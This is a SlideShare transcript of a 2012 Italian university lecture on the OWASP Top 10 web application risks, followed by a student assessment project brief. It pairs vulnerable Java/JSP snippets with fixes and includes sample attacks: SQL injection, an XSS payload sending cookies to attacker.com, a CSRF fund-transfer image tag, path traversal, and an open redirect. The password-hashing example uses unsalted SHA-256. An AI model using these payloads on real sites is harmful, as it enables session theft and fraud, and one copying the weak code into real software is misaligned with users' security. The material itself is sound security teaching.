• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
OWASP Top 10 Application Security Risks
 

OWASP Top 10 Application Security Risks

on

  • 2,689 views

Creative Commons Attribution-NonCommercial-ShareAlike License

Creative Commons Attribution-NonCommercial-ShareAlike License

Statistics

Views

Total Views
2,689
Views on SlideShare
2,689
Embed Views
0

Actions

Likes
4
Downloads
0
Comments
0

0 Embeds 0

No embeds

Accessibility

Upload Details

Uploaded via as Adobe PDF

Usage Rights

CC Attribution-NonCommercial-ShareAlike LicenseCC Attribution-NonCommercial-ShareAlike LicenseCC Attribution-NonCommercial-ShareAlike License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    OWASP Top 10 Application Security Risks OWASP Top 10 Application Security Risks Presentation Transcript

    • OWASP Top 10 Application Security Risks a cura di Francesco Iovine Università degli Studi di Roma "Tor Vergata" Facoltà di Ingegneria Corso di Sicurezza Informatica e Internet 1 Giugno 2012 http://www.flickr.com/photos/purpleslog/2880224058/
    • OWASP Top 10 Application Security Risks A1 | InjectionA2 | Cross-Site ScriptingA3 | Broken Authentication and Session ManagementA4 | Insecure Direct Object ReferencesA5 | Cross-Site Request Forgery (CSRF)A6 | Security MisconfigurationA7 | Insecure Cryptographic StorageA8 | Failure to Restrict URL AccessA9 | Insufficient Transport Layer ProtectionA10 | Unvalidated Redirects and Forwards
    • +R | I Fattori di Rischio
    • http://www.flickr.com/photos/doug88888/4561376850/
    • A1 | Injection Java String query = "SELECT * FROM accounts WHERE custID=" + request.getParameter("id") +""; http://example.com/app/accountView?id= or 1=1
    • A1 | Injection Java String selectStatement = "SELECT * FROM User WHERE userId = ? "; PreparedStatement prepStmt = con.prepareStatement(selectStatement); prepStmt.setString(1, userId); ResultSet rs = prepStmt.executeQuery();
    • http://www.flickr.com/photos/dlombardia/7198892852/
    • A2 | Cross-Site Scripting Java String page += "<input name=creditcard type=TEXT‘ value=" + request.getParameter("CC") + ">"; ><script>document.location= http://www.attacker.com/cgi-bin/cookie.cgi? foo=+document.cookie</script> JSP <% String name = resultSet.getString("name"); %> Employee Name = <%= name %>LINKhttp://example.com/page.htm?p=<script>attack(document.cookie)</script>
    • A2 | Cross-Site Scripting JSP <div> il nome &egrave; <c:out value=${param.firstName}/> </div> HTTP Header / HTML meta Element Content-Security-Policy: default-src self; img-src *; object-src media1.example.com *.cdn.example.com; script-src trustedscripts.example.com
    • http://www.flickr.com/photos/ogimogi/2980070571
    • A3 | Broken Authentication and Session Managementhttp://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
    • A3 | Broken Authentication and Session Management Java public void logout() { HttpSession session = request.getSession(false); if (session != null) { session.invalidate(); } loggedIn = false; }
    • http://www.flickr.com/photos/lovestruck94/4462625337
    • A4 | Insecure Direct Object References Java String query = "SELECT * FROM accts WHERE account = ?";PreparedStatement pstmt = connection.prepareStatement(query,...);pstmt.setString(1,request.getParameter("acct"));ResultSet results = pstmt.executeQuery( );http://example.com/app/accountInfo?acct=notmyacct
    • A4 | Insecure Direct Object References JEE Spring Frameworks dispatcher.xml <bean id="userRoleAuthorizationInterceptor"class="com.example.UserRoleAuthorizationInterceptor" />
    • http://www.flickr.com/photos/brettdavis/3943432908
    • A5 | Cross-Site Request Forgery (CSRF)http://example.com/app/transferFunds?amount=1500&destAccount=4673243243 HTML on attacker-website.com <img src="http://example.com/app/transferFunds? amount=1500&destAccount=attackersAcct#“width="0" height="0" />
    • A5 | Cross-Site Request Forgery (CSRF) Java private String createToken() { String token= java.util.UUID.randomUUID().toString(); Session.setAttribute("token",token); } HTML <input type=”hidden” name=”token” value=”${sessionObject.token}”/> Java public void doPost(...) { if(!request.getSession().getAttribute("token") .equals(request.getParameter(“token”))){ throw SecurityException; } ... }
    • http://www.flickr.com/photos/learnscope/2547026015
    • A6 | Security Misconfiguration - Framework di sviluppo non aggiornato - Application Server: credenziali di default - Web Server: directory listing - Informazioni nei messaggi di errore
    • A6 | Security Misconfiguration web.xml <security-constraint> <web-resource-collection> <web-resource-name>SecureOrders</web-resource- name> <description>...</description> <url-pattern>/orders/*</url-pattern> </web-resource-collection> <auth-constraint> <role-name>assistant</role-name> <role-name>manager</role-name> </auth-constraint> <user-data-constraint> <description>SSL required</description> <transport-guarantee>CONFIDENTIAL</transport- guarantee> </user-data-constraint> </security-constraint>
    • http://www.flickr.com/photos/zebble/6786151
    • A7 | Insecure Cryptographic Storage - Backup di dati con chiave - Database delle password con hash senza salt - SQL Injection da applicazioni di front-end
    • A7 | Insecure Cryptographic Storage Java private String passwordDigest(String input) throws Exception { String output = null; byte text [] = input.getBytes(); MessageDigest algorithm = MessageDigest.getInstance ("SHA-256"); algorithm.reset(); algorithm.update(text); byte messageDigest[] = algorithm.digest(); StringBuffer hexString = new StringBuffer(); for (int i = 0; i < messageDigest.length; i++) { hexString.append(Integer.toHexString ((messageDigest[i] & 0xFF) | 0x100).toUpperCase ().substring(1,3)); } output = hexString.toString(); return output; }
    • http://www.flickr.com/photos/brewbooks/2591952795
    • A8 | Failure to Restrict URL Access http://www.example.com/app/getappInfo http://www.example.com/app/admin_getappInfo
    • A8 | Failure to Restrict URL Access http://www.example.com/openfile.jsp?file=report.pdf http://www.example.com/openfile.jsp?file=../../../../pvt-dir/pvt-file Java if (!filename.matches(“^[ a-z0-9-_]+.[a-z0-9]+$”) { throw SecurityException; }
    • http://www.flickr.com/photos/clickclaker/6747794029
    • A9 | Insufficient Transport Layer Protection - Autenticazione senza SSL: cattura del cookie di sessione - Certificato SSL non configurato correttamente: phishing - Connessione in chiaro con il database
    • A9 | Insufficient Transport Layer Protection web.xml <security-constraint> <web-resource-collection> <web-resource-name>Security page</web-resource- name> <url-pattern>/web/login/signup.jsp</url-pattern> </web-resource-collection> <user-data-constraint> <transport-guarantee>CONFIDENTIAL</transport- guarantee> </user-data-constraint> </security-constraint>
    • http://www.flickr.com/photos/nafmo/2226652256/
    • A10 | Unvalidated Redirects and Forwards - Redirect http://www.example.com/redirect.jsp?url=evil.com - Forward http://www.example.com/boring.jsp?fwd=admin.jsp
    • A10 | Unvalidated Redirects and Forwards JEE Spring Frameworks WizardFormController 1. http://www.example.com/transfer.htm 2. http://www.example.com/transfer.htm?_target1= 3. http://www.example.com/transfer.htm?_target2= 4. http://www.example.com/transfer.htm?_target3= 5. http://www.example.com/transfer.htm?_finish=
    • OWASP Top 10 Application Security Risks A1 | InjectionA2 | Cross-Site ScriptingA3 | Broken Authentication and Session ManagementA4 | Insecure Direct Object ReferencesA5 | Cross-Site Request Forgery (CSRF)A6 | Security MisconfigurationA7 | Insecure Cryptographic StorageA8 | Failure to Restrict URL AccessA9 | Insufficient Transport Layer ProtectionA10 | Unvalidated Redirects and Forwards
    • +R | I Fattori di Rischio
    • +D | Consigli per gli sviluppatori- Requisiti di Sicurezza delle Applicazioni (ASVS)- Architettura di Sicurezza delle Applicazioni (Developers Guide)- Controlli di Sicurezza Standard (ESAPI)- Ciclo di Vita di Sviluppo Sicuro (SAMM)- Conoscenza della Sicurezza delle Applicazioni (OWASP Education Project)
    • +V | Consigli per i Tester- Essere organizzati- Revisione del Codice- Sicurezza e Penetration Testing
    • +O | Consigli per le Organizzazioni- Cominciare da subito il programma per la sicurezza applicativa- Approccio orientato al rischio- Stabilire una base efficace per la sicurezza applicativa- Integrare la sicurezza nei processi esistenti- Dare visibilità al management
    • Riferimenti OWASP Top 10 Project" https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project OWASP Development Guide" https://www.owasp.org/index.php/OWASP_Guide_Project
    • Progetto 1 a cura di Francesco Iovine http://www.flickr.com/photos/purpleslog/2880224058/
    • Web Application SecurityViene richiesto di fornire un assessment della sicurezza di unapplicazione webutilizzando le tecniche indicateQuale linguaggio/framework per il codice?- Il più congeniale al gruppo di lavoroChe tipo di assessment?- focus sul testing- focus sul rischio- focus sullo sviluppo secondo le linee guida OWASP
    • Web Application SecurityQuale applicazione?- OWASP Broken Web Application Projecthttps://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project- Vulnerable Web Applications for Learninghttp://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/- Una propria applicazione web sviluppata per altri progetti o scritta ad-hoc. - Nel caso si scelga unapplicazione web che abbia un front-end mobile, fornireun assessment di sicurezza per lintero sistema seguendo le linee guidadellOWASP Mobile Security Project.
    • Riferimenti OWASP Top 10 Project" https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project OWASP Testing Guide" https://www.owasp.org/index.php/OWASP_Testing_Project OWASP Development Guide" https://www.owasp.org/index.php/OWASP_Guide_Project OWASP Mobile Security Project" https://www.owasp.org/index.php/OWASP_Mobile_Security_Project
    • Credits Simone Onofri Marco Ramilli Cinzia Querques